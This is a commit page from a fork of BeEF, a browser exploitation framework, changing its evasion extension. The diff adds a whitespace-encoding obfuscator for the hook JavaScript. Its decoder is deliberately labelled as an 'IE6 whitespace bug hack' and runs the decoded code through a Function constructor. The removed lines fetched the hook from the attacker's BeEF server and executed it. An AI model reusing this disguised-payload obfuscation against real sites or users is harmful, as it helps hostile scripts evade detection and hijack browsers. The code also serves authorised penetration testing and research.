Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

modified whitespace evasion technique to keep it simple - modified beefjs (just one line, i don't had much time to investigate my change but it seems to work better with it than without it :)

Browse Source
This commit is contained in:
Jean-Louis Huynen
2012-08-29 18:22:22 +02:00
parent 788cef08d3
commit e86712413c
4 changed files with 35 additions and 50 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
core/main/handlers/modules/beefjs.rb
View File

@@ -104,8 +104,7 @@ module BeEF
if config.get("beef.extension.evasion.enable")
evasion = BeEF::Extension::Evasion::Evasion.instance
@hook = evasion.add_bootstrapper + evasion.obfuscate(@hook)
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook
@final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook)
else
@final_hook = ext_js_to_not_obfuscate + @hook
end

5
extensions/evasion/config.yaml
View File

@@ -16,7 +16,7 @@
beef:
extension:
evasion:
enable: true
enable: true
name: 'Evasion'
authors: ["antisnatchor"]
exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"]
@@ -26,4 +26,5 @@ beef:
beef: "beef"
Beef: "Beef"
evercookie: "evercookie"
chain: ["scramble", "minify"]
#chain: ["scramble", "minify"]
chain: ["minify", "base64", "whitespace"]

1
extensions/evasion/extension.rb
View File

@@ -30,3 +30,4 @@ require 'extensions/evasion/helper'
require 'extensions/evasion/obfuscation/scramble'
require 'extensions/evasion/obfuscation/minify'
require 'extensions/evasion/obfuscation/base_64'
require 'extensions/evasion/obfuscation/whitespace'

76
extensions/evasion/obfuscation/whitespace.rb
View File

@@ -20,56 +20,40 @@ module BeEF
include Singleton
def need_bootstrap
false
true
end
def get_bootstrap
# the decode function is in plain text - called IE-spacer - because trolling is always a good idea
decode_function =
"//Dirty IE6 whitespace bug hack
function IE_spacer(css_space) {
var spacer = '';
for(y = 0; y < css_space.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(css_space.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
spacer += String.fromCharCode(v);
}return spacer;
}"
end
def execute(input, config)
print_debug input.length
size = input.length
encoded = encode(input)
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
config = BeEF::Core::Configuration.instance
hook = config.get("beef.http.hook_file")
host = config.get("beef.http.host")
port = config.get("beef.http.port")
decode_function =
"
//Dirty IE6 whitespace bug hack
#{var_name} = function (){
jQuery.get(\'http://#{host}:#{port}#{hook}\', function callback(data) {
var output = '';
var str = '//E'+'OH';
var chunks = data.split(str);
for (var i = 0; i < chunks.length; i++)
{
if(chunks[i].substring(0,4) == '----')
{
input = chunks[i].split('\\n');
input = input[0].substring(5);
for(y = 0; y < input.length/8; y++)
{
v = 0;
for(x = 0; x < 8; x++)
{
if(input.charCodeAt(x+(y*8)) > 9)
{
v++;
}
if(x != 7)
{
v = v << 1;
}
}
output += String.fromCharCode(v);
}
}
}alert(output.length);[].constructor.constructor(output)();
}, 'text');
}
#{var_name}();//EOH-----"
input = "#{decode_function}#{encoded}"
print_debug "[OBFUSCATION - WHITESPACE] Javascript has been Whitespace Encoded"
var_name = BeEF::Extension::Evasion::Helper::random_string(3)
input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();"
print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced"
input
end